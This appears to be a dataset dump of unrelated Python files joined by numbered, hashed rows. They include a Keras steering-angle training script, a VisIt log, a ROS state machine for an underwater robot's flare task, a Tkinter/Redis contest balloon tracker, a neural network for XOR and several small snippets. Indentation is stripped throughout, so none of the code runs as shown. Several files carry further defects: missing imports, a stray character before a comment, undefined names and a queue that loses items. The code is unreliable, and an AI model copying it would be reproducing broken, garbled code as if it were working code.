from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import time
import math
import cv2
import matplotlib
matplotlib.use("TkAgg")
from matplotlib import pyplot as plt
from keras.models import Sequential
from keras.layers import Lambda
from keras.layers.core import Dense, Activation, Flatten, Dropout
from keras.layers.convolutional import Convolution2D
from keras.layers.pooling import MaxPooling2D
from keras.optimizers import Adam
from keras.models import load_model
# Data augmentation constants
TRANS_X_RANGE = 10 # Number of translation pixels for augmented data (-RANGE/2, RANGE/2)
TRANS_Y_RANGE = 10 # Number of translation pixels for augmented data (-RANGE/2, RANGE/2)
TRANS_ANGLE = .3 # Maximum angle change when translating in the X direction
OFF_CENTER_IMG = .25 # Angle change when using off center images
DOWNSAMPLE_RATIO = 0.99
Learning_Rate = 0.0001
FOLDER = "examples/"
EPOCHS = 4
TRAINABLE = True
BRIGHTNESS_RANGE = 0.15
IMG_ROWS = 300
IMG_COLS = 300
SHAPE = (IMG_ROWS,IMG_COLS,3)
SAMPLES_TRAIN = 5000
SAMPLES_VALIDATION = 1000
def load_data(data):
temp = []
for i in range(len(data)):
im = cv2.imread(data[i])
im = misc.imresize(im,size=DOWNSAMPLE_RATIO)
im = crop(im)
# im = color_change(im)
temp.append(im)
return temp
def normalize(data):
a=-0.5
b=0.5
greyscale_min=0
greyscale_max=255
return a + ( ( (data - greyscale_min)*(b - a) )/(greyscale_max - greyscale_min))
def color_change(data):
x = cv2.cvtColor(data,cv2.COLOR_BGR2HSV)
return x
def adjust_brightness(im):
temp = cv2.cvtColor(im, cv2.COLOR_BGR2HSV)
# Compute a random brightness value and apply to the image
brightness = BRIGHTNESS_RANGE * np.random.uniform(-1,1)
temp[:, :, 2] = temp[:, :, 2] * (1-brightness)
# Convert back to RGB and return
return cv2.cvtColor(temp, cv2.COLOR_HSV2RGB)
def img_translate(img, angle):
# Randomly form the X translation distance and compute the resulting steering angle change
change = np.random.uniform(-0.5,0.5)
x_translation = (TRANS_X_RANGE * change)
new_angle = angle + (change * TRANS_ANGLE)
# Randomly compute a Y translation
y_translation = (TRANS_Y_RANGE * np.random.uniform(-0.5,0.5))
# Form the translation matrix
translation_matrix = np.float32([[1, 0, x_translation], [0, 1, y_translation]])
# Translate the image
return cv2.warpAffine(img, translation_matrix, (img.shape[1], img.shape[0])),new_angle
def crop(im):
shape = np.array(im).shape
y1 = int(shape[0]*0.4)
y2 = int(shape[0]*0.87)
# print(y)
im = im[y1:y2 , : , :]
im = cv2.resize(im, (IMG_ROWS, IMG_COLS), interpolation=cv2.INTER_AREA)
return im
def curve_focus(xdata,ydata):
count = 0
for x in range(len(xdata)):
if(ydata[x]==0.000):
count+=1
print("Total = {}\n0 Steering = {}".format(len(xdata),count))
return xdata,ydata
def flip(xdata,ydata):
for x in range(len(xdata)):
flip = np.fliplr(xdata[x])
xdata = np.append(xdata, [flip], axis=0)
ydata = np.append(ydata, (-1*ydata[x]))
return xdata,ydata
def set_model():
model = Sequential()
model.add(Lambda(lambda x: x/127.5 - 1.,
input_shape=SHAPE,
output_shape=SHAPE))
model.add(Convolution2D(3, 1, 1, border_mode='same', name='color_conv'))
model.add(Convolution2D(36,5,5,border_mode='same',activation="elu",
name='conv1'))
model.add(Convolution2D(48,3,3,activation="elu",border_mode='same',
name='conv2'))
model.add(Convolution2D(64,3,3,activation="elu",border_mode='same',
name='conv3'))
model.add(Convolution2D(64,3,3,activation="elu",border_mode='same', name='conv4'))
model.add(Flatten(name='flat1'))
# model.add(Dropout(0.2))
# model.add(Dense(1164, activation="elu"))
# model.add(Dropout(.3, name='drop1'))
model.add(Dense(100, activation="elu", name='dense1'))
model.add(Dense(50, activation="elu", name='dense2'))
model.add(Dense(10, activation="elu", name='dense3'))
model.add(Dense(1, activation="linear", name='dense4'))
return model
def my_range(start, end, step):
while start <= end:
yield round(start,1)
start += step
def show_data(log):
fig = plt.figure(figsize=(8,2))
a = fig.add_subplot(1,2,1)
im = cv2.imread(FOLDER+log[560,0].strip())
im = cv2.cvtColor(im,cv2.COLOR_BGR2RGB)
a.set_title("Full Resolution")
plt.axis('off')
plt.imshow(im)
im = misc.imresize(im,size=0.2)
a = fig.add_subplot(1,2,2)
a.set_title("After 80% Downsampling")
plt.imshow(im)
# im = crop(im)
# im, an = process_line(log[600])
# a = fig.add_subplot(2,1,2)
# im, an = process_line(log[600])
# plt.imshow(im,aspect="auto",interpolation="nearest")
plt.axis('off')
fig.savefig('examples/Downsampling.png')
plt.show()
exit()
# plt.hist(steer,bins=100)
# plt.show()
# exit()
count = 1
y = 0
steer = log[:,3]
for x in my_range(-0.8,0.7,0.1):
while 1:
y = np.random.randint(len(steer))
if(round(steer[y],1)==x):
print("Found {}",(x))
break
# else:
# print("Discarded {}",steer[y])
a=fig.add_subplot(4,5,count)
im = cv2.imread(FOLDER+log[y,0])
im,angle = process_line(log[y])
a.set_title(str(x)+" to "+str(round(angle,1)))
plt.imshow(im,aspect="auto",interpolation="nearest")
count+=1
# print(x)
plt.show()
exit()
pic = np.random.randint(len(X_train))
print(X_train.shape)
plt.imshow(X_train[pic])
plt.show()
exit()
def augment(x,y):
x,y = flip(x,y)
return x,y
def process_line(sample):
img_choice = np.random.randint(3)
angle = 0.0
if(img_choice==0):
angle = float(sample[3])
elif(img_choice==1):
angle = float(sample[3])+0.27
elif(img_choice==2):
angle = float(sample[3])-0.27
im = cv2.imread(FOLDER+sample[img_choice].strip())
im = misc.imresize(im,size=DOWNSAMPLE_RATIO)
im = crop(im)
im = adjust_brightness(im)
im,angle = img_translate(im,angle)
# im = normalize(im)
return im,angle
def generator(samples, batch_size=32):
"""
Purpose: Yield tensor batches to fit_generator function
Inputs: A file path
Outputs: X_train, a [AHH, 80, 320, 3] tensor and y_train, a [AHH, 1] matrix
Where AHH = ((FEATURE_GENERATION_MULTIPLE * 3) + 3) * BATCH_SIZE
"""
num_samples = len(samples)
shuffle(samples)
while 1: # Loop forever so the generator never terminates
for offset in range(0, num_samples, batch_size):
batch_samples = samples[offset:offset+batch_size]
images = []
angles = []
for batch_sample in batch_samples:
image,angle = process_line(batch_sample)
images.append(image)
angles.append(angle)
# trim image to only see section with road
X_train = np.array(images)
y_train = np.array(angles)
X_train, y_train = augment(X_train,y_train)
yield shuffle(X_train, y_train)
if __name__ == "__main__":
log = pd.read_csv(FOLDER+"driving_log.csv").values
show_data(log)
print(log.shape)
train_samples, validation_samples = train_test_split(log,test_size=0.2)
im,an = process_line(train_samples[np.random.randint(len(train_samples))])
print(np.array(im).shape)
# plt.imshow(im)
# plt.title(str(an))
# plt.show()
# exit()
model = set_model()
# model.load_weights('weights.h5',by_name=True)
adam = Adam(lr=Learning_Rate)
model.compile(optimizer = adam, loss = 'mean_squared_error')
history=model.fit_generator(generator(train_samples), samples_per_epoch =
SAMPLES_TRAIN, validation_data=generator(validation_samples),
nb_val_samples=SAMPLES_VALIDATION, nb_epoch=EPOCHS, verbose=1)
model.save_weights('weights.h5')
model.save('model.h5')
print("Model saved")
def for_drive(im):
print(im.shape)
x = im
x = misc.imresize(x,size=DOWNSAMPLE_RATIO)
x = crop(x)
# plt.imshow(x)
# plt.show()
# x = color_change(x)
# x = normalize(x)
return x
|
2,983 | 6d0cfc9d5bbc45bfa356c45a7cdb9f4822b03e0a | # Visit 2.12.3 log file
ScriptVersion = "2.12.3"
if ScriptVersion != Version():
print "This script is for VisIt %s. It may not work with version %s" % (ScriptVersion, Version())
visit.ShowAllWindows()
visit.ShowAllWindows()
visit.OpenDatabase("test.vtk", 0)
# The UpdateDBPluginInfo RPC is not supported in the VisIt module so it will not be logged.
visit.AddPlot("Pseudocolor", "scalars", 1, 1)
visit.DrawPlots()
SaveWindowAtts = visit.SaveWindowAttributes()
SaveWindowAtts.outputToCurrentDirectory = 1
SaveWindowAtts.outputDirectory = "."
SaveWindowAtts.fileName = "visit"
SaveWindowAtts.family = 1
SaveWindowAtts.format = SaveWindowAtts.PNG # BMP, CURVE, JPEG, OBJ, PNG, POSTSCRIPT, POVRAY, PPM, RGB, STL, TIFF, ULTRA, VTK, PLY
SaveWindowAtts.width = 1024
SaveWindowAtts.height = 1024
SaveWindowAtts.screenCapture = 0
SaveWindowAtts.saveTiled = 0
SaveWindowAtts.quality = 80
SaveWindowAtts.progressive = 0
SaveWindowAtts.binary = 0
SaveWindowAtts.stereo = 0
SaveWindowAtts.compression = SaveWindowAtts.PackBits # None, PackBits, Jpeg, Deflate
SaveWindowAtts.forceMerge = 0
SaveWindowAtts.resConstraint = SaveWindowAtts.ScreenProportions # NoConstraint, EqualWidthHeight, ScreenProportions
SaveWindowAtts.advancedMultiWindowSave = 0
visit.SetSaveWindowAttributes(SaveWindowAtts)
visit.SaveWindow()
# Begin spontaneous state
View3DAtts = visit.View3DAttributes()
View3DAtts.viewNormal = (0.264045, 0.220135, 0.939053)
View3DAtts.focus = (1, 1, 1)
View3DAtts.viewUp = (0.100817, 0.961974, -0.253856)
View3DAtts.viewAngle = 30
View3DAtts.parallelScale = 1.73205
View3DAtts.nearPlane = -3.4641
View3DAtts.farPlane = 3.4641
View3DAtts.imagePan = (0, 0)
View3DAtts.imageZoom = 1
View3DAtts.perspective = 1
View3DAtts.eyeAngle = 2
View3DAtts.centerOfRotationSet = 0
View3DAtts.centerOfRotation = (1, 1, 1)
View3DAtts.axis3DScaleFlag = 0
View3DAtts.axis3DScales = (1, 1, 1)
View3DAtts.shear = (0, 0, 1)
View3DAtts.windowValid = 1
visit.SetView3D(View3DAtts)
# End spontaneous state
|
2,984 | 0bb2a6ebbf75fae3466c34a435a531fabdc07f62 | #!/usr/bin/env python
'''
State Machine for the Flare task
'''
import roslib
import rospy
import actionlib
from rospy.timer import sleep
import smach
import smach_ros
from dynamic_reconfigure.server import Server
import math
import os
import sys
import numpy as np
from bbauv_msgs.msg import *
from bbauv_msgs.srv import *
from flare_vision import Flare
#Global variables
isStart = False
isEnd = False
isTestMode = False #If test mode then don't wait for mission call
rosRate = None
flare = None
VisionLoopCount = 0 #Counter for number of times the image is being processed
flareSeen = False
mani_pub = None
movement_client = None
locomotionGoal = None
flare_params = {'flare_area':0, 'centering_x':0, 'centering_y':0}
#Starts off in disengage class
class Disengage(smach.State):
def __init__(self, flare_task):
smach.State.__init__(self, outcomes=['start_complete', 'complete_outcome', 'aborted'])
self.flare = flare_task
def execute(self, userdata):
# self.flare.unregister()
if self.flare.isKilled:
rospy.signal_shutdown("Bye")
return 'aborted'
while self.flare.isAborted:
rospy.sleep(rospy.Duration(0.2))
if self.flare.testing:
self.flare.register()
rospy.loginfo("Starting Flare")
return 'start_complete'
#Searches for the flare
class Search(smach.State):
timeout = 10000 #5s timeout before aborting task
def __init__(self, flare_task):
smach.State.__init__(self, outcomes=['search_complete', 'aborted', 'mission_abort'])
self.flare = flare_task
if self.flare.testing:
self.flare.unregisterHeading()
#rospy.loginfo(self.flare.curHeading)
def execute(self, userdata):
#Check for abort signal
if self.flare.isAborted:
rospy.signal_shutdown("Bye!")
return 'aborted'
#Check if flare found or timeout already
timecount = 0
while not self.flare.rectData['detected']:
if timecount > self.timeout or rospy.is_shutdown() or self.flare.isKilled:
self.flare.abortMission()
self.flare.failedTask();
return 'aborted'
self.flare.sendMovement(forward=1.0)
rospy.sleep(rospy.Duration(0.5))
timecount += 1
return 'search_complete'
#Bash towards the flare!
class Manuoevre(smach.State):
def __init__(self, flare_task):
smach.State.__init__(self, outcomes=['manuoevring', 'manuoevre_complete',
'aborted', 'mission_abort'])
self.flare = flare_task
self.deltaThresh = 0.15
self.prevAngle = []
self.count = 0
self.flareSeen = True
def execute(self,userdata):
#Check for aborted signal
if self.flare.isAborted:
rospy.signal_shutdown("Bye!")
return 'aborted'
# #Cannot detect already
# if not self.flare.rectData['detected']:
# self.count += 1
# if self.count > 4:
# self.flare.taskComplete()
# return 'manuoevre_complete'
# if not self.flare.rectData['detected'] and self.flareSeen:
# self.flare.sendMovement(forward=2.0)
# rospy.sleep(rospy.Duration(3))
# self.flare.taskComplete()
# return 'manuoevre_complete'
#Get to the flare
screenWidth = self.flare.screen['width']
screenCenterX = screenWidth / 2
deltaX = (self.flare.rectData['centroids'][0] - screenCenterX) / screenWidth
#rospy.loginfo("Delta X {}".format(deltaX))
rospy.loginfo("Area {}".format(self.flare.rectData['area']))
#Forward if center
rospy.loginfo("Delta X: {}".format(deltaX))
if abs(deltaX) < 0.15:
self.flare.sendMovement(forward=self.flare.forwardOffset)
rospy.sleep(rospy.Duration(0.5))
else:
#Sidemove if too far off center
sidemove = math.copysign(deltaX*self.flare.deltaXMultiplier, deltaX) #Random number
# sidemove = math.copysign(0.5, deltaX)
self.flare.sendMovement(forward=0.10, sidemove=sidemove)
rospy.sleep(rospy.Duration(0.5))
#Shoot straight and aim
if self.flare.rectData['area'] > self.flare.headOnArea:
return 'manuoevre_complete'
return 'manuoevring'
#return 'manuoevre_complete'
class Completing(smach.State):
def __init__(self, flare_task):
smach.State.__init__(self, outcomes=['complete_complete', 'completing',
'aborted', 'mission_abort'])
self.flare = flare_task
self.count = 0
def execute(self,userdata):
#Check for aborted signal
if self.flare.isAborted:
self.flare.isKilled = True
rospy.signal_shutdown("Bye!")
return 'aborted'
screenWidth = self.flare.screen['width']
screenCenterX = screenWidth / 2
deltaX = (self.flare.rectData['centroids'][0] - screenCenterX) / screenWidth
deltaXMult =2.0
rospy.loginfo("Delta X:{}".format(deltaX))
if abs(deltaX) < 0.03:
self.count += 1
rospy.loginfo("Count: {}".format(self.count))
return 'completing'
if self.count >= 2000:
self.flare.sendMovement(forward=4.0)
rospy.loginfo("Hitting the flare")
self.flare.locomotionClient.wait_for_result()
self.flare.sendMovement(forward=-2.0) #Retract
self.flare.locomotionClient.wait_for_result()
self.flare.taskComplete()
return 'complete_complete'
else:
self.count = 0
sidemove = math.copysign(deltaX*deltaXMult, deltaX) #Random number
self.flare.sendMovement(forward=0.00, sidemove=sidemove)
rospy.sleep(rospy.Duration(0.5))
return 'completing'
#self.flare.taskComplete()
#return 'complete_complete'
'''
Main python thread
'''
def handle_srv(req):
global isStart
global isAbort
global locomotionGoal
global flare
rospy.loginfo("Flare service handled")
if req.start_request:
rospy.loginfo("Flare is Start")
isStart = True
isAbort = False
#locomotionGoal = req.start_ctrl
if req.abort_reqest:
rospy.loginfo("Flare abort received")
isAbort = True
isStart = False
flare.unregister()
#To fill accordingly
return mission_to_visionResponse(isStart, isAbort)
#Param config callback
def flareCallback(conig, level):
for param in flare.yellow_params:
flare.yellow_params[param] = config['yellow_' + param]
isTestMode = config["testing"]
return config
#Utility function for normalising heading
def normHeading(heading):
if heading > 360:
return heading - 360
elif heading < 0:
return heading + 360
else:
return heading
if __name__ == '__main__':
rospy.init_node("Flare", anonymous=False)
rosRate = rospy.Rate(20)
flare_task = Flare()
rospy.loginfo("Flare loaded!")
#Create state machine container
sm = smach.StateMachine(outcomes=['complete_flare', 'aborted'])
#Disengage, Search, Manuoevre
with sm:
smach.StateMachine.add("DISENGAGE", Disengage(flare_task),
transitions={'start_complete': "SEARCH",
'complete_outcome': 'complete_flare',
'aborted': 'aborted'})
smach.StateMachine.add("SEARCH", Search(flare_task),
transitions={'search_complete': "MANUOEVRE", 'aborted': 'aborted',
'mission_abort': "DISENGAGE"})
smach.StateMachine.add("MANUOEVRE", Manuoevre(flare_task),
transitions = {'manuoevring': "MANUOEVRE",
'manuoevre_complete': "COMPLETING",
'aborted': 'aborted',
'mission_abort': "DISENGAGE"})
smach.StateMachine.add("COMPLETING", Completing(flare_task),
transitions = {'complete_complete': "DISENGAGE",
'completing': "COMPLETING",
'aborted': 'aborted',
'mission_abort': "DISENGAGE"})
sis = smach_ros.IntrospectionServer('flare_task', sm, '/SM_ROOT')
sis.start()
outcomes = sm.execute()
#wait for ctrl-c
rospy.spin()
sis.stop()
|
2,985 | 76e1f811d06af0e6e83ae989a236a5cd22c55e01 | # -*- coding: utf-8 -*-
import argparse
import redis
from Tkinter import *
import ttk
import json
import time
import thread
R = None
NAME = {}
PROBLEM_NAME = {}
CONTEST_ID = None
QUEUE_NAME = None
BACKUP_QUEUE_NAME = None
RUNID_FIELD = "runid"
SUBMIT_TIME_FIELD = "submit_time"
STATUS_FIELD = "status"
STATUS_FINISHED = "finished"
STATUS_WAIT = "wait"
def lower_bound(arr, key):
left = 0
right = len(arr) - 1
res = len(arr)
while left <= right:
mid = (left + right) >> 1
if arr[mid] >= key:
res = mid
right = mid - 1
else:
left = mid + 1
return res
def get_status_key(user_id, pid):
return "status_%d_%d" % (user_id, pid)
def get_name(user_id):
user_id = str(user_id)
if user_id in NAME:
return NAME[user_id]
else:
return "user: %s" % user_id
def get_problem_color(pid):
pid = str(pid)
if pid in PROBLEM_NAME:
return PROBLEM_NAME[pid]
else:
return str(pid)
class PrinterTkinter:
def __init__(self):
self.root = Tk()
self.root.title("气球发放")
self.runid_to_node = dict()
self.runid_to_uid = dict()
self.runid_to_pid = dict()
self.have_uid_pid = set()
self.unfinished_runid = []
self.frame_left_top = Frame(width=400, height=200)
self.frame_right_top = Frame(width=400, height=200)
self.frame_center = Frame(width=800, height=400)
self.frame_bottom = Frame(width=800, height=50)
# 定义左上方区域
self.left_top_title = Label(self.frame_left_top, text="发放状态:", font=('Arial', 25))
self.left_top_title.grid(row=0, column=0, columnspan=2, sticky=NSEW, padx=50, pady=30)
self.var_finish = StringVar()
self.var_wait = StringVar()
self.left_top_frame = Frame(self.frame_left_top)
self.left_top_frame_left1 = Label(self.frame_left_top, text="已发放", font=('Arial', 20))
self.left_top_frame_left2 = Label(self.frame_left_top, textvariable=self.var_finish, font=('Arial', 15))
self.var_finish.set(0)
self.left_top_frame_right1 = Label(self.frame_left_top, text="未发放", font=('Arial', 20))
self.left_top_frame_right2 = Label(self.frame_left_top, textvariable=self.var_wait, font=('Arial', 15))
self.var_wait.set(0)
self.left_top_frame_left1.grid(row=1, column=0)
self.left_top_frame_left2.grid(row=1, column=1)
self.left_top_frame_right1.grid(row=2, column=0)
self.left_top_frame_right2.grid(row=2, column=1)
# 定义右上方区域
self.var_entry = StringVar()
self.right_top_title = Label(self.frame_right_top, text="切换状态(输入runid):", font=('Arial', 20))
self.right_top_entry = Entry(self.frame_right_top, textvariable=self.var_entry)
self.number = int
self.right_top_button = Button(self.frame_right_top, text="确定", command=self.button_switch, font=('Arial', 15))
self.right_top_title.grid(row=0, column=0)
self.right_top_entry.grid(row=1, column=0)
self.right_top_button.grid(row=2, column=0, padx=20, pady=20)
# 定义中心列表区域
self.tree = ttk.Treeview(self.frame_center, show="headings", height=18, columns=("a", "b", "c", "d", "e"))
self.vbar = ttk.Scrollbar(self.frame_center, orient=VERTICAL, command=self.tree.yview)
# 定义树形结构与滚动条
self.tree.configure(yscrollcommand=self.vbar.set)
# 表格的标题
self.tree.column("a", width=50, anchor="center")
self.tree.column("b", width=150, anchor="center")
self.tree.column("c", width=150, anchor="center")
self.tree.column("d", width=200, anchor="center")
self.tree.column("e", width=150, anchor="center")
self.tree.heading("a", text="Runid")
self.tree.heading("b", text="User")
self.tree.heading("c", text="Problem")
self.tree.heading("d", text="Time")
self.tree.heading("e", text="Status")
# 调用方法获取表格内容插入
self.get_tree()
self.tree.grid(row=0, column=0, sticky=NSEW)
self.vbar.grid(row=0, column=1, sticky=NS)
# 整体区域定位
self.frame_left_top.grid(row=0, column=0, padx=2, pady=5)
self.frame_right_top.grid(row=0, column=1, padx=30, pady=30)
self.frame_center.grid(row=1, column=0, columnspan=2, padx=4, pady=5)
self.frame_bottom.grid(row=2, column=0, columnspan=2)
self.frame_left_top.grid_propagate(0)
self.frame_right_top.grid_propagate(0)
self.frame_center.grid_propagate(0)
self.frame_bottom.grid_propagate(0)
thread.start_new_thread(self.listen, ())
self.root.mainloop()
# 表格内容插入
def get_tree(self):
bak_list = R.lrange(BACKUP_QUEUE_NAME, 0, -1)
for bak in bak_list:
bak = bak.split('_')
uid = int(bak[0])
pid = int(bak[1])
runid = int(bak[2])
self.runid_to_uid[runid] = uid
self.runid_to_pid[runid] = pid
if R.hget(get_status_key(uid, pid), RUNID_FIELD) == None:
R.hset(get_status_key(uid, pid), RUNID_FIELD, runid)
status = STATUS_WAIT
R.hset(get_status_key(uid, pid), STATUS_FIELD, status)
submit_time = time.ctime()
R.hset(get_status_key(uid, pid), SUBMIT_TIME_FIELD, submit_time)
self.have_uid_pid.add("%d_%d" % (uid, pid))
elif "%d_%d" % (uid, pid) in self.have_uid_pid:
continue
else:
status = R.hget(get_status_key(uid, pid), STATUS_FIELD)
submit_time = R.hget(get_status_key(uid, pid), SUBMIT_TIME_FIELD)
self.have_uid_pid.add("%d_%d" % (uid, pid))
if status == STATUS_FINISHED:
self.var_finish.set(int(self.var_finish.get()) + 1)
pos = "end"
else:
self.var_wait.set(int(self.var_wait.get()) + 1)
pos = lower_bound(self.unfinished_runid, runid)
self.unfinished_runid.insert(pos, runid)
node = self.tree.insert("", str(pos), values=(runid, get_name(uid), get_problem_color(pid), submit_time, status))
self.runid_to_node[runid] = node
def button_switch(self):
self.number = self.right_top_entry.get()
runid = int(self.right_top_entry.get())
if not (runid in self.runid_to_node):
return
self.tree.delete(self.runid_to_node[runid])
uid = self.runid_to_uid[runid]
pid = self.runid_to_pid[runid]
status_before = R.hget(get_status_key(uid, pid), STATUS_FIELD)
submit_time = R.hget(get_status_key(uid, pid), SUBMIT_TIME_FIELD)
if status_before == STATUS_WAIT:
status = STATUS_FINISHED
R.hset(get_status_key(uid, pid), STATUS_FIELD, STATUS_FINISHED)
else:
status = STATUS_WAIT
R.hset(get_status_key(uid, pid), STATUS_FIELD, STATUS_WAIT)
if status == STATUS_FINISHED:
pos = lower_bound(self.unfinished_runid, runid)
self.unfinished_runid.pop(pos)
pos = "end"
else:
pos = lower_bound(self.unfinished_runid, runid)
self.unfinished_runid.insert(pos, runid)
node = self.tree.insert("", str(pos), values=(runid, get_name(uid), get_problem_color(pid), submit_time, status))
if status == STATUS_WAIT:
self.var_wait.set(int(self.var_wait.get()) + 1)
self.var_finish.set(int(self.var_finish.get()) - 1)
else:
self.var_wait.set(int(self.var_wait.get()) - 1)
self.var_finish.set(int(self.var_finish.get()) + 1)
R.hset(get_status_key(uid, pid), STATUS_FIELD, status)
self.runid_to_node[runid] = node
def listen(self):
while True:
msg = R.blpop(QUEUE_NAME, 0)[1]
R.rpush(BACKUP_QUEUE_NAME, msg)
bak = msg.split('_')
uid = int(bak[0])
pid = int(bak[1])
runid = int(bak[2])
self.runid_to_uid[runid] = uid
self.runid_to_pid[runid] = pid
if R.hget(get_status_key(uid, pid), RUNID_FIELD) == None:
R.hset(get_status_key(uid, pid), RUNID_FIELD, runid)
status = STATUS_WAIT
R.hset(get_status_key(uid, pid), STATUS_FIELD, status)
submit_time = time.ctime()
R.hset(get_status_key(uid, pid), SUBMIT_TIME_FIELD, submit_time)
self.have_uid_pid.add("%d_%d" % (uid, pid))
elif "%d_%d" % (uid, pid) in self.have_uid_pid:
continue
else:
status = R.hget(get_status_key(uid, pid), STATUS_FIELD)
submit_time = R.hget(get_status_key(uid, pid), SUBMIT_TIME_FIELD)
self.have_uid_pid.add("%d_%d" % (uid, pid))
if status == STATUS_FINISHED:
self.var_finish.set(int(self.var_finish.get()) + 1)
pos = "end"
else:
self.var_wait.set(int(self.var_wait.get()) + 1)
pos = lower_bound(self.unfinished_runid, runid)
self.unfinished_runid.insert(pos, runid)
node = self.tree.insert("", str(pos),
values=(runid, get_name(uid), get_problem_color(pid), submit_time, status))
self.runid_to_node[runid] = node
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='NENU-OJ Ballon')
parser.add_argument('--namefile', dest='namefile', required=True, type=str, help='such as namefile.json')
parser.add_argument('--problemfile', dest='problemfile', required=True, type=str, help='such as problemfile.json')
parser.add_argument('--redishost', dest='redishost', required=True, type=str, help='such as 127.0.0.1')
parser.add_argument('--redisport', dest='redisport', required=True, type=int, help='such as 6379')
parser.add_argument('--contestid', dest='contestid', required=True, type=int, help='such as 9')
args = parser.parse_args()
R = redis.Redis(host=args.redishost, port=args.redisport)
CONTEST_ID = args.contestid
with open(args.namefile) as f:
NAME = json.loads(f.read())
with open(args.problemfile) as f:
PROBLEM_NAME = json.loads(f.read())
QUEUE_NAME = "ballon_%d" % CONTEST_ID
BACKUP_QUEUE_NAME = "ballon_bak_%d" % CONTEST_ID
PrinterTkinter()
|
2,986 | d4d8d800b81a50f2c520f0394412935738d1a8ee | class Queue(object):
def __init__(self, val_list=None):
self.stack_one = []
self.stack_two = []
if val_list:
for item in val_list:
self.stack_one.append(item)
def push(self, val=None):
if val:
self.stack_one.append(val)
def pop(self):
for index in range(0, len(self.stack_one)):
self.stack_two.append(self.stack_one.pop())
self.stack_two.pop()
def main():
a = Queue()
if __name__ == '__main__':
main()
|
2,987 | 00f62fec7f5372c5798b0ebf3f3783233360581e | #!/usr/bin/env python3
import sys
import csv
import math
import collections
import argparse
import fileinput
import lp
parser = argparse.ArgumentParser(description="Takes an input of *.lp format and sets all radii to the same value")
parser.add_argument("inputfile", help="if specified reads a *.lp formatted file otherwise standard in")
R = 1
def main():
reader = csv.reader(row for row in fileinput.input() if not row.startswith('#'))
circles = lps.parse_lps(reader)
for circle in circles:
circle.r = R
print(circle)
if __name__ == "__main__":
main()
|
2,988 | a6a5fddb8e1eda4cc8e9c79ad83019f55d149a80 | import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_digits
from sklearn.metrics import confusion_matrix, classification_report
from sklearn.preprocessing import LabelBinarizer
def tanh(x):
return np.tanh(x)
def tanh_deriv(x):
return 1.0 - np.tanh(x) * np.tanh(x)
def logistic(x):
return 1 / (1 + np.exp(-x))
def logistic_derivative(x):
return logistic(x) * (1 - logistic(x))
class NeuralNetwork:
def __init__(self, layers, activation='tanh'):
"""
:param layers: A list containing the number of units in each layer.
Should be at least two values
:param activation: The activation function to be used. Can be
"logistic" or "tanh"
"""
if activation == 'logistic':
self.activation = logistic
self.activation_deriv = logistic_derivative
elif activation == 'tanh':
self.activation = tanh
self.activation_deriv = tanh_deriv
self.weights = []
for i in range(1, len(layers) - 1):
print(i)
self.weights.append((2 * np.random.random((layers[i - 1] + 1, layers[i] + 1)) - 1) * 0.25)
self.weights.append((2 * np.random.random((layers[i] + 1, layers[i + 1])) - 1) * 0.25)
# print(self.weights)
def fit(self, X, y, learning_rate=0.2, epochs=10000):
# 一. 给X数据加一列1,相当于后续的偏置所乘的数
X = np.atleast_2d(X)
print(X)
print(X.shape)
temp = np.ones([X.shape[0], X.shape[1] + 1])
# print(temp)
temp[:, 0:-1] = X # adding the bias unit to the input layer
X = temp
print(X)
y = np.array(y)
print(y)
# 迭代epochs次
for k in range(epochs):
# 随机挑选X的一行,i为行号,a为这一行数据,为输入层数据
i = np.random.randint(X.shape[0])
a = [X[i]]
# a为每层的值,a[0]为第一层输入层数据,a[1]为第二层输出层数据,a[-1]为最后一层输出层数据
for l in range(len(self.weights)):
# 计算每层的结果
a.append(self.activation(np.dot(a[l], self.weights[l])))
# Computer the error at the top layer
# print(a)
error = y[i] - a[-1]
# For output layer, Err calculation (delta is updated error)
deltas = [error * self.activation_deriv(a[-1])]
# Staring backprobagation
for l in range(len(a) - 2, 0, -1): # we need to begin at the second to last layer
# Compute the updated error (i,e, deltas) for each node going from top layer to input layer
deltas.append(deltas[-1].dot(self.weights[l].T) * self.activation_deriv(a[l]))
deltas.reverse()
# print(deltas)
for i in range(len(self.weights)):
layer = np.atleast_2d(a[i])
delta = np.atleast_2d(deltas[i])
self.weights[i] += learning_rate * layer.T.dot(delta)
def predict(self, x):
x = np.array(x)
temp = np.ones(x.shape[0] + 1)
temp[0:-1] = x
a = temp
for l in range(0, len(self.weights)):
a = self.activation(np.dot(a, self.weights[l]))
return a
nn = NeuralNetwork([2, 2, 1], 'tanh')
X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
y = np.array([0, 1, 1, 0])
nn.fit(X, y)
for i in [[0, 0], [0, 1], [1, 0], [1, 1]]:
print(i, nn.predict(i))
# digits = load_digits()
# X = digits.data
# y = digits.target
# X -= X.min() # normalize the values to bring them into the range 0-1
# X /= X.max()
#
# nn = NeuralNetwork([64, 100, 10], 'logistic')
# X_train, X_test, y_train, y_test = train_test_split(X, y)
# labels_train = LabelBinarizer().fit_transform(y_train)
# labels_test = LabelBinarizer().fit_transform(y_test)
# print("start fitting")
# nn.fit(X_train, labels_train, epochs=3000)
# predictions = []
# for i in range(X_test.shape[0]):
# o = nn.predict(X_test[i])
# predictions.append(np.argmax(o))
# print(confusion_matrix(y_test, predictions))
# print(classification_report(y_test, predictions))
|
2,989 | 524b6ebd0be4c2285fac540627bb48baca71452e | g#https://www.acmicpc.net/problem/9461
'''
1. Divide 2 case △ and ▽
d[0] is △ sequence
d[1] is ▽ sequence
2. find a role between d[0] and d[1]
'''
import math
t = int(input())
n = []
for _ in range(t):
n.append(int(input()))
index = math.ceil(max(n)/2)
d = [[0 for _ in range(52)] for _ in range(2)]
d[0][1],d[0][2],d[1][1],d[1][2] = 1,1,1,2
for i in range(3,index + 1):
d[0][i] = d[1][i-1] + d[1][i-3]
d[1][i] = d[0][i] + d[0][i-2]
for k in n:
if k % 2 == 1:
print(d[0][math.ceil(k/2)])
else:
print(d[1][math.ceil(k/2)]) |
2,990 | 47dc9212a1059cbca8ec6732deaa835fa9967fd8 | from leapp.models import Model, fields
from leapp.topics import TransactionTopic
class TargetRepositoryBase(Model):
topic = TransactionTopic
repoid = fields.String()
class UsedTargetRepository(TargetRepositoryBase):
pass
class RHELTargetRepository(TargetRepositoryBase):
pass
class CustomTargetRepository(TargetRepositoryBase):
name = fields.Nullable(fields.String())
baseurl = fields.Nullable(fields.String())
enabled = fields.Boolean(default=True)
